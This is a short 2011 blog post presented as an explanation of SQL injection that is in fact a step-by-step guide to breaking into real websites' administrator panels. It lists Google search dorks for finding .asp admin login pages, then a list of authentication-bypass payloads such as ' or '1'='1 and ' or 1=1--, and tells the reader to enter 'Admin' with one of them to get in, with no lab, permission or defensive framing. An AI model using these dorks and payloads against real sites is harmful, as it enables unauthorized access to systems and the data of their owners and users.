Wednesday, 6 April 2011

0

what is sql injection? PART 1

  • Wednesday, 6 April 2011
  • PRABH KARAN SINGH
  • Share
  • A injecting sql queries into another database or using queries to get auth bypass as an admin.

    part 1 : Basic sql injection

    Gaining auth bypass on an admin account.
    Most sites vulnerable to this are .asp
    First we need 2 find a site, start by opening google.
    Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"
    There is a large number of google dork for basic sql injection.
    here is the best:
    "inurl:admin.asp"
    "inurl:login/admin.asp"
    "inurl:admin/login.asp"
    "inurl:adminlogin.asp"
    "inurl:adminhome.asp"
    "inurl:admin_login.asp"
    "inurl:administratorlogin.asp"
    "inurl:login/administrator.asp"
    "inurl:administrator_login.asp"

    Now what to do once we get to our site.
    the site should look something like this :

    welcome to xxxxxxxxxx administrator panel
    username :
    password :

    so what we do here is in the username we always type "Admin"
    and for our password we type our sql injection

    here is a list of sql injections

    ' or '1'='1
    ' or 'x'='x
    ' or 0=0 --

    " or 0=0 --

    or 0=0 --

    ' or 0=0 #

    " or 0=0 #

    or 0=0 #

    ' or 'x'='x

    " or "x"="x

    ') or ('x'='x

    ' or 1=1--

    " or 1=1--

    or 1=1--

    ' or a=a--

    " or "a"="a

    ') or ('a'='a

    ") or ("a"="a

    hi" or "a"="a

    hi" or 1=1 --

    hi' or 1=1 --
    'or'1=1'


    there are many more but these are the best ones that i know of
    and what this sql injection is doing : confusing the fuck out of the database till it gives you auth bypass.

    So your input should look like this

    username:Admin
    password:'or'1'='1

    So click submit and you'r in
    NOTE not all sites are vulnerable.

    0 Responses to “ what is sql injection? PART 1 ”

    Post a Comment